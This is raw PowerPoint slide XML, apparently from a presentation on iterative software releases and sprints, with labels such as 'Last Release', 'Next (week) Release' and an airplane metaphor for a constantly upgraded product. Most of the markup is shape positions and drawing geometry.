                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0475667A-A78D-B0DA-0E98-80177C716B41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D5E9D-4CEB-6BAD-BDE1-6EA5F60117C8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A7833F-A3E0-882C-89B7-32C30490F00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86726D-5928-A6A6-D3CF-93CF1E19C6BB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B11905-3AF1-97A2-81ED-0F98DDD78DB0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5518205" y="3267986"/>
            <a:ext cx="993913" cy="3339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3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EFDF10A-F22B-82ED-509D-E4F2D5D0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5429" y="1943897"/>
            <a:ext cx="4821742" cy="9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64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E413D-A993-00CA-B3AE-5C82393F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12" y="890485"/>
            <a:ext cx="7377751" cy="40122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608F36-4644-CB94-764F-1EC2559F1E8A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3160712" y="1115781"/>
            <a:ext cx="583469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C6689C-CF6D-B84F-A077-8F536425F2FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4677250" y="2896627"/>
            <a:ext cx="1371876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1F972B-543F-9DD2-5017-11978345051F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5113647" y="3151288"/>
            <a:ext cx="1145239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1B6CA-9F30-DB66-2F7F-B73472951586}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3136601" y="3649102"/>
            <a:ext cx="3399551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4B64C3-ED31-67C7-04BB-C91F411FB142}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="256986" y="224590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731265-9404-58F3-CE45-0978A5253DC7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1894540" y="616053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CF20980-4884-9608-D7FE-FECE1AE262DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2181410" y="385954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D143E7-AB3D-A2E5-75E9-FBEE6AE67D7F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1737164" y="337615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438578-77E9-0142-2D82-3454875C83CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3211350" y="616053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rminator 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E842110-847C-4524-A248-6141ACDC1C4C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3498220" y="385954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30896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917773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481105" y="4288804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2103718" y="3452097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312768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3420528" y="3452097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05F26C1-39B6-80E7-B3C9-DB527BBEABD2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="1548572" y="3909370"/>
            <a:ext cx="741082" cy="4863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2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1 month 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sprints</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="110176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airplane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Google Shape;627;p46">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D4C0306-1304-71B4-AE52-FBF6AC79FF31}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7108734" y="283172"/>
            <a:ext cx="1667132" cy="1646381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flown every day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A Plane that is constantly upgraded, and just got a new engine</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="315998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27200" y="1396192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2525060" y="2167157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2029011" y="2394263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335877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3651624" y="155755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3207378" y="150921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2517079" y="210415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467558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4968434" y="1557556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81A6AC-4EE4-10B3-6F8A-305FAD0823CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3285068" y="2049942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don’t know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CF289D4C-3719-0406-A4E3-BC4BF1F388F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:endCxn id="19" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="2687563" y="2260954"/>
            <a:ext cx="717864" cy="92614"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector4">
            <a:avLst>
              <a:gd name="adj1" fmla="val 31060"/>
              <a:gd name="adj2" fmla="val 3468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9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2" name="Slide Number Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{007D11EB-5B97-FA48-577C-3BC5A766A35B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9599682" y="5156341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E166452-E7D8-F20D-CBB1-29981EE5F833}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="391367" y="2186893"/>
            <a:ext cx="8335735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C7C8A80-DA4A-AE8D-8991-0412ABEB1055}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="554652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A8FEDB1-CE6F-912A-BE05-057D266E4B3D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="789084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527A717-0E20-5D9B-6EA9-95F96526B584}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1737800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23D32F6-F207-7B2E-3312-1C3007E1054C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1594813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6C086FE-BD3B-05CF-DAFB-B38E3E152417}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1920331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AAA3B8A-7497-3BE0-C363-2E3DA8FAC1AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="239132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91AC149-C40C-75E0-0F85-522F8AB95438}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2587271" y="2006223"/>
            <a:ext cx="365760" cy="36576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09A024-38F7-7A9C-412E-A621261EEE06}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3806227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15ABE7D-0340-E26E-31DE-E383A2FEE805}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3333722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A50220B-1084-82A0-F9FE-C97ADA499EBF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="360766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976543E-85DE-2EEC-283D-4D98758D71D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4015583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FD49074-8122-C5A9-AEDD-9928F4FA9638}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4175105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358900-57D6-3F40-D5DF-FF7D355C55CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4369737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D365C62-F6E5-2136-EAE2-53E6B3CBFB86}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4754580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CE05AD9-396D-924B-A48F-DF64997278FE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4978514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9F1FCA1-707E-D4D8-38ED-731B7B5ECADE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="534995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D99D305-5E56-8970-39CD-B536CFEC2FF0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="554589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F88F25E-3C3E-93CE-0701-E9ED10856952}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="621495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584E651-075B-6B5A-8A7A-016F3FDB8ACD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6431902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0C51EA5-AAD1-8A79-48FC-7EE25AF53800}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6636123" y="2029083"/>
            <a:ext cx="320040" cy="3200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00BB088-E1C2-405A-39C3-A23809E2BDC5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6950909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99EEBB9-0C6D-8AA6-A726-CB667B4637D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731100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6DE8E95-DD25-50FF-507B-DF1C7874FE14}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="177932" y="2536085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Last Release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ECEDE89-87DD-AE32-512B-21B76F0FF72F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="488875" y="2186893"/>
            <a:ext cx="0" cy="34919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E80C8B-5AE1-2173-F24D-6A58C3CC4AFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8727102" y="2186893"/>
            <a:ext cx="0" cy="41238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7BC8A756-9320-DB36-A4E5-40596947B244}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="92048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D2EBD45-3D7A-D061-FF5F-6DC65BF3601F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1085726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189AA3E-7F12-DC56-9B92-4334770115CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="126250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431AEF3-6A02-2D9B-1BC9-8CBB9D911037}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1391685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B61B67D-8172-A78F-64BC-60E4DD41FA23}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="205912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EE18B57-38AD-0108-8BC0-F32C1E3814D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="222748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098828B-A9B1-41BD-CD90-A490D011633A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2963268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A543D82-5EF9-D719-C38D-C10206DAC9E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3139861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9AC380C-4F85-FFA0-7BEC-ED68410D1CAE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="344800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9E6040B-8344-B753-0F41-80E05E5063D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="456763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0D3F6C0-A7E7-B89E-1E5F-8A555138CCEB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="509867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895E09C-6F8A-017F-A53B-20BAF4FDF2B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5724518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B51F8B-6134-D709-97B3-AF3C1652E8B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5971013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AC9D816-094D-10A7-F2B6-FB16BF054A54}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7110098" y="2074803"/>
            <a:ext cx="228600" cy="22860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A346C7A-1CA8-A90E-5BDD-91439FC22ED8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7492844" y="2570155"/>
            <a:ext cx="1494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Next (week) Release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2CE4924-278D-0F08-1DE3-17556506D471}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7495983" y="1890773"/>
            <a:ext cx="0" cy="2961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BEA8BCB-47D0-0124-6FA3-632EA33A0E1B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7078129" y="1672827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week 3 (now)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E399AE88-B6CE-7C40-D45C-B30F583A6F24}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="3844966" y="-1587550"/>
            <a:ext cx="238346" cy="6971306"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 238346 w 834746"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 1430134"/>
              <a:gd name="connsiteX1" fmla="*/ 834746 w 834746"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 1430134"/>
              <a:gd name="connsiteX2" fmla="*/ 834746 w 834746"/>
              <a:gd name="connsiteY2" fmla="*/ 1430134 h 1430134"/>
              <a:gd name="connsiteX3" fmla="*/ 238346 w 834746"/>
              <a:gd name="connsiteY3" fmla="*/ 1430134 h 1430134"/>
              <a:gd name="connsiteX4" fmla="*/ 119173 w 834746"/>
              <a:gd name="connsiteY4" fmla="*/ 1310961 h 1430134"/>
              <a:gd name="connsiteX5" fmla="*/ 119173 w 834746"/>
              <a:gd name="connsiteY5" fmla="*/ 834240 h 1430134"/>
              <a:gd name="connsiteX6" fmla="*/ 0 w 834746"/>
              <a:gd name="connsiteY6" fmla="*/ 715067 h 1430134"/>
              <a:gd name="connsiteX7" fmla="*/ 119173 w 834746"/>
              <a:gd name="connsiteY7" fmla="*/ 595894 h 1430134"/>
              <a:gd name="connsiteX8" fmla="*/ 119173 w 834746"/>
              <a:gd name="connsiteY8" fmla="*/ 119173 h 1430134"/>
              <a:gd name="connsiteX9" fmla="*/ 238346 w 834746"/>
              <a:gd name="connsiteY9" fmla="*/ 0 h 1430134"/>
              <a:gd name="connsiteX0" fmla="*/ 834746 w 926186"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 1430134"/>
              <a:gd name="connsiteX1" fmla="*/ 834746 w 926186"/>
              <a:gd name="connsiteY1" fmla="*/ 1430134 h 1430134"/>
              <a:gd name="connsiteX2" fmla="*/ 238346 w 926186"/>
              <a:gd name="connsiteY2" fmla="*/ 1430134 h 1430134"/>
              <a:gd name="connsiteX3" fmla="*/ 119173 w 926186"/>
              <a:gd name="connsiteY3" fmla="*/ 1310961 h 1430134"/>
              <a:gd name="connsiteX4" fmla="*/ 119173 w 926186"/>
              <a:gd name="connsiteY4" fmla="*/ 834240 h 1430134"/>
              <a:gd name="connsiteX5" fmla="*/ 0 w 926186"/>
              <a:gd name="connsiteY5" fmla="*/ 715067 h 1430134"/>
              <a:gd name="connsiteX6" fmla="*/ 119173 w 926186"/>
              <a:gd name="connsiteY6" fmla="*/ 595894 h 1430134"/>
              <a:gd name="connsiteX7" fmla="*/ 119173 w 926186"/>
              <a:gd name="connsiteY7" fmla="*/ 119173 h 1430134"/>
              <a:gd name="connsiteX8" fmla="*/ 238346 w 926186"/>
              <a:gd name="connsiteY8" fmla="*/ 0 h 1430134"/>
              <a:gd name="connsiteX9" fmla="*/ 926186 w 926186"/>
              <a:gd name="connsiteY9" fmla="*/ 91440 h 1430134"/>
              <a:gd name="connsiteX0" fmla="*/ 834746 w 834746"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 1430134"/>
              <a:gd name="connsiteX1" fmla="*/ 834746 w 834746"/>
              <a:gd name="connsiteY1" fmla="*/ 1430134 h 1430134"/>
              <a:gd name="connsiteX2" fmla="*/ 238346 w 834746"/>
              <a:gd name="connsiteY2" fmla="*/ 1430134 h 1430134"/>
              <a:gd name="connsiteX3" fmla="*/ 119173 w 834746"/>
              <a:gd name="connsiteY3" fmla="*/ 1310961 h 1430134"/>
              <a:gd name="connsiteX4" fmla="*/ 119173 w 834746"/>
              <a:gd name="connsiteY4" fmla="*/ 834240 h 1430134"/>
              <a:gd name="connsiteX5" fmla="*/ 0 w 834746"/>
              <a:gd name="connsiteY5" fmla="*/ 715067 h 1430134"/>
              <a:gd name="connsiteX6" fmla="*/ 119173 w 834746"/>
              <a:gd name="connsiteY6" fmla="*/ 595894 h 1430134"/>
              <a:gd name="connsiteX7" fmla="*/ 119173 w 834746"/>
              <a:gd name="connsiteY7" fmla="*/ 119173 h 1430134"/>
              <a:gd name="connsiteX8" fmla="*/ 238346 w 834746"/>
              <a:gd name="connsiteY8" fmla="*/ 0 h 1430134"/>
              <a:gd name="connsiteX0" fmla="*/ 834746 w 834746"/>
              <a:gd name="connsiteY0" fmla="*/ 1430134 h 1430134"/>
              <a:gd name="connsiteX1" fmla="*/ 238346 w 834746"/>
              <a:gd name="connsiteY1" fmla="*/ 1430134 h 1430134"/>
              <a:gd name="connsiteX2" fmla="*/ 119173 w 834746"/>
              <a:gd name="connsiteY2" fmla="*/ 1310961 h 1430134"/>
              <a:gd name="connsiteX3" fmla="*/ 119173 w 834746"/>
              <a:gd name="connsiteY3" fmla="*/ 834240 h 1430134"/>
              <a:gd name="connsiteX4" fmla="*/ 0 w 834746"/>
              <a:gd name="connsiteY4" fmla="*/ 715067 h 1430134"/>
              <a:gd name="connsiteX5" fmla="*/ 119173 w 834746"/>
              <a:gd name="connsiteY5" fmla="*/ 595894 h 1430134"/>
              <a:gd name="connsiteX6" fmla="*/ 119173 w 834746"/>
              <a:gd name="connsiteY6" fmla="*/ 119173 h 1430134"/>
              <a:gd name="connsiteX7" fmla="*/ 238346 w 834746"/>
              <a:gd name="connsiteY7" fmla="*/ 0 h 1430134"/>
              <a:gd name="connsiteX0" fmla="*/ 238346 w 238346"/>
              <a:gd name="connsiteY0" fmla="*/ 1430134 h 1430134"/>
              <a:gd name="connsiteX1" fmla="*/ 119173 w 238346"/>
              <a:gd name="connsiteY1" fmla="*/ 1310961 h 1430134"/>
              <a:gd name="connsiteX2" fmla="*/ 119173 w 238346"/>
              <a:gd name="connsiteY2" fmla="*/ 834240 h 1430134"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 238346"/>
              <a:gd name="connsiteY3" fmla="*/ 715067 h 1430134"/>
              <a:gd name="connsiteX4" fmla="*/ 119173 w 238346"/>
              <a:gd name="connsiteY4" fmla="*/ 595894 h 1430134"/>
              <a:gd name="connsiteX5" fmla="*/ 119173 w 238346"/>
              <a:gd name="connsiteY5" fmla="*/ 119173 h 1430134"/>
              <a:gd name="connsiteX6" fmla="*/ 238346 w 238346"/>
              <a:gd name="connsiteY6" fmla="*/ 0 h 143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346" h="1430134">
                <a:moveTo>
                  <a:pt x="238346" y="1430134"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="172529" y="1430134"/>
                  <a:pt x="119173" y="1376778"/>
                  <a:pt x="119173" y="1310961"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="119173" y="834240"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="119173" y="768423"/>
                  <a:pt x="65817" y="715067"/>
                  <a:pt x="0" y="715067"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="65817" y="715067"/>
                  <a:pt x="119173" y="661711"/>
                  <a:pt x="119173" y="595894"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="119173" y="119173"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="119173" y="53356"/>
                  <a:pt x="172529" y="0"/>
                  <a:pt x="238346" y="0"/>
                </a:cubicBez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B201F9-6E89-39C8-CEC1-7CFF73F3DEFF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3675928" y="1540760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Work ( in progress )</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="100" name="Google Shape;154;p7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5EE186B4-05EC-969F-763A-EA67AECDE2B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1031891" y="3456436"/>
            <a:ext cx="1334388" cy="1396427"/>
            <a:chOff x="7328522" y="1582300"/>
            <a:chExt cx="440376" cy="460851"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="101" name="Google Shape;155;p7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA2458FB-0867-BE8B-35F2-CBDCB8E74DA0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7453929" y="1582300"/>
              <a:ext cx="200090" cy="184918"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="200090" h="184918" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="10399" y="124702"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="8671" y="127048"/>
                    <a:pt x="7617" y="129919"/>
                    <a:pt x="7617" y="133056"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7617" y="140870"/>
                    <a:pt x="13951" y="147205"/>
                    <a:pt x="21765" y="147205"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25660" y="147205"/>
                    <a:pt x="29186" y="145628"/>
                    <a:pt x="31744" y="143082"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="43756" y="167821"/>
                    <a:pt x="69045" y="184918"/>
                    <a:pt x="98393" y="184918"/>
                  </a:cubicBezTo>
